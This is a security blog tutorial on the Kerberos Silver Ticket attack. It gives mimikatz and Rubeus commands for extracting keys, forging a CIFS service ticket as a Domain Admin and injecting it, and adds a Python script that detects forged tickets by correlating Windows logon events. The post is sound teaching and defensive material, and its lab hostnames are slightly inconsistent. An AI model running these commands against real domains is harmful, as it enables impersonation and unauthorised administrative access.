Tickets Kerberos - Silver Ticket

Celia Catalán

Continuing our series on Kerberos tickets: in previous posts we covered the Golden Ticket; this time we look at the Silver Ticket.

SILVER TICKET

The Silver Ticket attack consists of forging a Ticket Granting Service (TGS) ticket, which lets an attacker access a specific service in an Active Directory environment without authenticating against the domain controller (the Key Distribution Center, KDC).

The method relies on obtaining the NTLM hash or password of a service account and using it to forge the TGS ticket. These credentials can be captured in several ways during a domain attack, for example with tools such as Responder or through Kerberoasting. With the forged ticket, an attacker can access that specific service impersonating any user, usually with the goal of obtaining administrative privileges.

If, instead of the clear-text password or NTLM hash, the AES keys can be obtained (for example, from a memory dump), it is recommended to create the tickets with those AES keys, since this is a safer and less detectable approach.

Exploitation:

First, let's assume that we have obtained a session as SYSTEM on a machine in the domain. This could have happened, for example, after compromising an IIS server and subsequently escalating privileges with a Potato exploit.

After gaining control of the server, we can extract the Kerberos keys with mimikatz and the command sekurlsa::ekeys.



Ticket creation

Once we have the Kerberos keys, we can create a ticket for the CIFS service of that same server, which will give us access to it as any domain user we choose. In this case we create the ticket with the command:

Rubeus.exe silver /service:cifs/castelblack.north.servingkingdom.local /aes256:0ad6c98bbba174b0b2f8d9a05279fe6892cef5f0e1bab59e01b5510e9920774d /user:eddard.stark /domain:north.servingkingdom.local /sid:S-1-5-21-1430251130-2586379517-4083755373 /nowrap



  • Service: name of the service for which the ticket is forged
  • Aes256: AES256 key of the machine account extracted earlier
  • User: user to impersonate, in this case a Domain Admin
  • Domain: domain name
  • Sid: SID of the domain

Import the ticket

Once the ticket has been generated, we can first verify that our non-privileged user console does not have administrative access to the server:

ls \\castelblack.north.sevenkingdoms.local\C$



The next step is to import the previously generated ticket into a new process. This can be done with the command:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /username:eddard.stark /password:PassFake /ticket:doIGGDCC[…]b2NhbA==


  • Program: command to execute, into which the ticket will be injected
  • Domain: domain name
  • Username: domain user
  • Password: user password. It is not necessary to know the user's real password.
  • Ticket: the ticket created previously

After creating the process with our Silver Ticket, we can now access the server in question through the CIFS service from our non-privileged user session:

ls \\castelblack.north.sevenkingdoms.local\c$
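From the defender's side, the property that makes this attack work is also what gives it away: the forged ticket is minted with the service key and never passes through the KDC, so the member server records a Kerberos network logon (Event ID 4624, logon type 3, authentication package Kerberos) for which no TGS request (Event ID 4769) exists on any domain controller for that user and that server's machine account. The following is an added example, not code from the original post, that correlates constructed sample events from both hosts and flags the orphan logons; event field names and the host CASTELBLACK$ are assumptions for the illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). The fields mirror what a SIEM would
# normalise from Windows Security logs: 4769 (TGS requested, logged on the DC)
# and 4624 (account logon, logged on the member server).
DC_4769 = [
    {"ts": "2024-05-01T10:00:05", "user": "jon.snow", "service": "CASTELBLACK$", "source": "10.0.0.25"},
]
SERVER_4624 = [
    {"ts": "2024-05-01T10:00:07", "user": "jon.snow", "logon_type": 3, "auth_pkg": "Kerberos", "source": "10.0.0.25"},
    {"ts": "2024-05-01T10:15:42", "user": "eddard.stark", "logon_type": 3, "auth_pkg": "Kerberos", "source": "10.0.0.25"},
    {"ts": "2024-05-01T10:16:00", "user": "arya.stark", "logon_type": 3, "auth_pkg": "NTLM", "source": "10.0.0.30"},
]


def _parse(ts):
    return datetime.fromisoformat(ts)


def find_orphan_kerberos_logons(dc_events, server_events, server_account, window=timedelta(hours=10)):
    """Return the 4624 Kerberos network logons on the server for which no 4769
    was logged on the DC for the same user and this server's machine account
    within the preceding window. A legitimate service ticket is always issued by
    the KDC (one 4769); a Silver Ticket is forged offline, so no 4769 exists.
    The default window matches the default 10-hour service ticket lifetime, so a
    cached ticket reused for a later logon is not reported as suspicious."""
    tgs_index = {}
    for ev in dc_events:
        if ev["service"].upper() == server_account.upper():
            tgs_index.setdefault(ev["user"].lower(), []).append(_parse(ev["ts"]))

    orphans = []
    for ev in server_events:
        if ev["logon_type"] != 3 or ev["auth_pkg"] != "Kerberos":
            continue  # NTLM and interactive logons are outside this check
        t = _parse(ev["ts"])
        requests = tgs_index.get(ev["user"].lower(), [])
        if not any(t - window <= r <= t for r in requests):
            orphans.append(ev)
    return orphans


if __name__ == "__main__":
    for hit in find_orphan_kerberos_logons(DC_4769, SERVER_4624, "CASTELBLACK$"):
        print(f"Kerberos logon without TGS request: {hit['user']} at {hit['ts']} from {hit['source']}")
```

In a real environment the 4769 feed must come from every domain controller, since the TGS request may be served by any of them; a gap in DC log collection produces the same signal as a forged ticket.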


Limitations:

A Silver Ticket is valid only for the specific service for which it was created; it does not grant access to other services or resources.

That concludes this post. We now know about both the Silver Ticket and the Golden Ticket; one more installment about these Kerberos tickets is pending. Until the next ticket.

Álvaro Temes, cybersecurity analyst at Zerolynx.
